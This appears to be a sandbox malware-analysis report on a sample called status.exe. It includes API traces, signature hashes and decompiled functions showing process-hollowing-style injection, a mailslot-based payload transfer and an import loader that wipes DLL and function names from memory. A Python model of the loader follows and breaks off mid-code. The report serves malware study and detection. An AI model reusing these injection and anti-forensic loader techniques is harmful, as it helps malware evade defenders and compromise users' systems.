  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:707D88A25F54B3F8785905F254974BCE
Total matches:35
Initial Analysis Report:Open
Initial sample Analysis ID:63657
Initial sample SHA 256:8A647D2B5F178B35CEBC334CAD30C8D315F3482D8395263A2C84DB68B5510A62
Initial sample name:status.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
E00401639(intOrPtr __eax, long _a4) {
    void* _v8;
    long _v12;
    void* _v16;
    void _v28;
    void* __ebx;
    void* _t29;
    void* _t34;
    long _t45;
    void* _t47;
    void* _t51;

     *0x40305c = __eax;   // heap handle; E00401033 below passes it to HeapReAlloc
    _v28 = _a4;           // shared context handed to both worker threads
     *0x4030e8 = 0x736c6e70; // executed; "pnls" in little-endian ASCII, the same string that appears in the FindWindowA listing below
    _t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed; mailslot reader thread (E00401033 below)
    _v8 = _t29;
    if(_t29 == 0) {
        _a4 = GetLastError();
    } else {
        _t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed; mailslot writer thread (E004010FB below)
        _t47 = _t34;
        _v16 = _t47;
        if(_t47 == 0) {
            _a4 = GetLastError();
        } else {
            _a4 = 0;
            WaitForSingleObject(_t47, 0xffffffff); // executed; wait for the writer to finish
            if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
                TerminateThread(_v8, _a4);   // writer failed: kill the reader, which would otherwise keep polling the mailslot
            } else {
                WaitForSingleObject(_v8, 0xffffffff);
                if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
                    _t45 = E00401593( &_v28, _t51); // executed; consumes the received buffer (VirtualAlloc in its listing below)
                    _a4 = _t45;
                }
            }
            CloseHandle(_v16);
        }
        CloseHandle(_v8);
    }
    return _a4;   // a Win32 error code, 0 on success
}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
E004010FB(void* __ebx, void* __edi, void* _a4) {
    struct _SECURITY_ATTRIBUTES* _v8;
    long _v12;
    long _v16;
    void* _v20;
    void* _v24;
    void* _t28;
    void* _t34;
    int _t39;
    long _t40;
    long _t43;
    void* _t45;
    long _t46;
    void* _t48;
    void* _t52;

    _t48 = __edi;
    _t45 = __ebx;
    _v8 = 0;   // bytes sent so far (used as an offset below, whatever the decompiler's type says)
    do {
        // GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING
        _t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
        _v20 = _t28;
        if(_t28 != 0xffffffff) {
            _v12 = 0;
        } else {
            _v12 = GetLastError();
            Sleep(0x64);
        }
    } while (_v12 == 2);   // ERROR_FILE_NOT_FOUND: retry every 100 ms until the reader thread has created the slot
    if(_v12 != 0) {
        L19:
        return _v12;
    }
    _t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed; produces the payload (_a4 = buffer, _v24 = length)
    if(_t34 == 0) {
        _v12 = 0xb;   // ERROR_BAD_FORMAT
        L18:
        CloseHandle(_v20);
        goto L19;
    }
    _t52 = _a4;
    _push(_t45);
    _t46 = _v24;   // bytes remaining
    _push(_t48);
    do {
        _v16 = _t46;
        if(_t46 >= 0x1000) {
            _v16 = 0x1000;   // one mailslot message per 0x1000-byte chunk
        }
        _t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
        if(_t39 == 0) {
            _t40 = GetLastError();
            _v12 = _t40;
            if(_t40 != 0x79) {   // ERROR_SEM_TIMEOUT retries the same chunk; any other error aborts
                break;
            }
        } else {
            _t43 = _v16;
            _v8 = _v8 + _t43;
            _t46 = _t46 - _t43;
            if(_t46 == 0 && _t43 == 0x1000) {
                // payload ended exactly on a 0x1000 boundary: step back one byte and send it
                // again as a 1-byte message, which is the short read the reader stops on
                _t46 = _t46 + 1;
                _v8 = _v8 - 1;
            }
        }
        Sleep(0x64); // executed
    } while (_t46 != 0);
    memset(_t52, 0, _v8);   // wipe the payload before E00401207 frees it (HeapFree in its listing below)
    E00401207(_t52);
    goto L18;
}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
E00401389(void* __edi, intOrPtr _a4) {   // __edi = image base, _a4 = IMAGE_NT_HEADERS of the mapped image
    _Unknown_base(*)()* _v4;
    intOrPtr _v8;
    struct HINSTANCE__* _v12;
    signed int _v16;
    intOrPtr _t23;
    struct HINSTANCE__* _t24;
    intOrPtr _t27;
    intOrPtr _t28;
    _Unknown_base(*)()* _t29;
    intOrPtr _t33;
    intOrPtr* _t34;
    intOrPtr _t35;
    void* _t42;
    CHAR* _t44;
    intOrPtr* _t46;
    CHAR* _t49;
    signed int* _t50;
    intOrPtr _t57;

    _t42 = __edi;
    _t50 =  &_v16;
    _v16 = _v16 & 0x00000000;   // result: 0, 0x7e (ERROR_MOD_NOT_FOUND) or 0x7f (ERROR_PROC_NOT_FOUND)
    _t33 =  *((intOrPtr*)(_a4 + 0x80));   // DataDirectory[IMPORT].VirtualAddress (PE32: NT headers + 0x80)
    if(_t33 == 0) {
        L23:
        return _v16;
    }
    _t34 = _t33 + __edi;   // first IMAGE_IMPORT_DESCRIPTOR
    _t23 =  *((intOrPtr*)(_t34 + 0xc));   // descriptor.Name
    if(_t23 == 0) {
        goto L23;
    }
    while(1) {
        _t44 = _t23 + _t42;
        _t24 = LoadLibraryA(_t44); // executed
        _v12 = _t24;
        if(_t24 == 0) {
            break;
        }
        memset(_t44, 0, lstrlenA(_t44));   // DLL name zeroed once loaded: a later memory dump carries no import strings
        _t27 =  *_t34;                         // descriptor.OriginalFirstThunk
        _t35 =  *((intOrPtr*)(_t34 + 0x10));   // descriptor.FirstThunk (the IAT)
        _t50 =  &(_t50[3]);
        if(_t27 != 0) {
            L6:
            _t46 = _t27 + _t42;   // current name-thunk entry
            _t28 =  *_t46;
            if(_t28 == 0) {
                L19:
                _t23 =  *((intOrPtr*)(_t34 + 0x20));   // next descriptor's Name (0x14 + 0xc)
                _t34 = _t34 + 0x14;                    // sizeof(IMAGE_IMPORT_DESCRIPTOR)
                if(_t23 != 0) {
                    continue;
                }
                L22:
                goto L23;
            }
            _v8 = _t35 - _t46 + _t42;   // offset from a name thunk to its IAT slot
            _t57 = _t28;
            L8:
            if(_t57 < 0) {
                // high bit set: the value is range-checked against [base, base + SizeOfImage) (+0x50) instead of being rebased
                if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
                    _t28 = 0;
                }
            } else {
                _t28 = _t28 + _t42;   // IMAGE_IMPORT_BY_NAME
            }
            _t11 = _t28 + 2; // 0x2: skip the WORD hint, leaving the function name
            _t49 = _t11;
            _t29 = GetProcAddress(_v12, _t49);
            _v4 = _t29;
            if(_t29 == 0) {
                goto L18;
            }
            if(_t49 >= 0) {
                memset(_t49, 0, lstrlenA(_t49));   // function name zeroed as well
                _t50 =  &(_t50[3]);
            }
             *(_v8 + _t46) = _v4;   // resolved address written into the IAT slot
            _t46 = _t46 + 4;
            _t28 =  *_t46;
            if(_t28 != 0) {
                goto L8;
            } else {
                goto L19;
            }
            L18:
            _v16 = 0x7f;   // ERROR_PROC_NOT_FOUND, but resolution continues with the next descriptor
            goto L19;
        }
        _t27 = _t35;   // no OriginalFirstThunk: walk the IAT itself
        if(_t35 == 0) {
            goto L19;
        }
        goto L6;
    }
    _v16 = 0x7e;   // ERROR_MOD_NOT_FOUND: stop entirely
    goto L22;
}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
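The loader loop in E00401389 above, as an added Python model (not code from the report or from the sample): it lays out a constructed PE32 import directory in a flat buffer, walks it the way the decompile does (LoadLibraryA per descriptor, GetProcAddress per IMAGE_IMPORT_BY_NAME with the 2-byte hint skipped, the result stored in the matching FirstThunk slot, a failed DLL load aborting with 0x7e and a failed lookup recording 0x7f but moving on) and zeroes every DLL and function name after use, which is the detail that matters for memory forensics: a dump of the resolved image no longer contains its import strings. RVAs are plain buffer offsets here, LoadLibraryA and GetProcAddress are replaced by stand-in callables with made-up handles and addresses, and the high-bit thunk branch of the decompile is deliberately not modeled.

```python
import struct
from typing import Callable, Dict, List, Optional

# Constructed model of the import-resolution loop in E00401389. The image is a
# flat buffer in which RVAs are plain offsets (the decompile's base + RVA
# arithmetic collapses to the offset), and LoadLibraryA / GetProcAddress are
# replaced by the stand-in callables at the bottom. No real DLL is touched.

ERROR_MOD_NOT_FOUND = 0x7E      # `_v16 = 0x7e`: LoadLibraryA failed, abort
ERROR_PROC_NOT_FOUND = 0x7F     # `_v16 = 0x7f`: GetProcAddress failed, keep going
DESC_SIZE = 0x14                # sizeof(IMAGE_IMPORT_DESCRIPTOR), the `_t34 + 0x14` step
ORDINAL_FLAG32 = 0x80000000


def build_import_table(imports: Dict[bytes, List[bytes]]) -> bytearray:
    """Lay out a PE32 import directory at offset 0 of a fresh buffer
    (constructed test data: only the part the loader walks, not a whole PE)."""
    img = bytearray(DESC_SIZE * (len(imports) + 1))   # includes the all-zero terminator

    def put(blob: bytes) -> int:
        rva = len(img)
        img.extend(blob)
        return rva

    for i, (dll, funcs) in enumerate(imports.items()):
        name_rva = put(dll + b"\0")
        # IMAGE_IMPORT_BY_NAME: WORD hint followed by the NUL-terminated name
        by_name = [put(struct.pack("<H", 0) + f + b"\0") for f in funcs]
        thunks = struct.pack("<%dI" % (len(by_name) + 1), *by_name, 0)
        oft, ft = put(thunks), put(thunks)   # OriginalFirstThunk, FirstThunk (IAT)
        struct.pack_into("<IIIII", img, i * DESC_SIZE, oft, 0, 0, name_rva, ft)
    return img


def resolve_imports(img: bytearray, import_dir: int,
                    load_library: Callable[[bytes], Optional[int]],
                    get_proc_address: Callable[[int, bytes], Optional[int]]) -> int:
    """Walk the descriptors as E00401389 does and return its _v16 result."""
    def cstr(rva: int) -> bytes:
        return bytes(img[rva:img.index(b"\0", rva)])

    def wipe(rva: int) -> None:                     # memset(s, 0, lstrlenA(s))
        end = img.index(b"\0", rva)
        img[rva:end] = bytes(end - rva)

    status, desc = 0, import_dir
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", img, desc)
        if name_rva == 0:                           # `_t23 == 0`: end of the array
            return status
        module = load_library(cstr(name_rva))       # LoadLibraryA(descriptor.Name)
        if module is None:
            return ERROR_MOD_NOT_FOUND
        wipe(name_rva)                              # DLL name is gone from memory now
        names = oft or ft                           # `_t27 = *desc; if 0 use FirstThunk`
        idx = 0
        while names:
            entry = struct.unpack_from("<I", img, names + 4 * idx)[0]
            if entry == 0:
                break
            if entry & ORDINAL_FLAG32:
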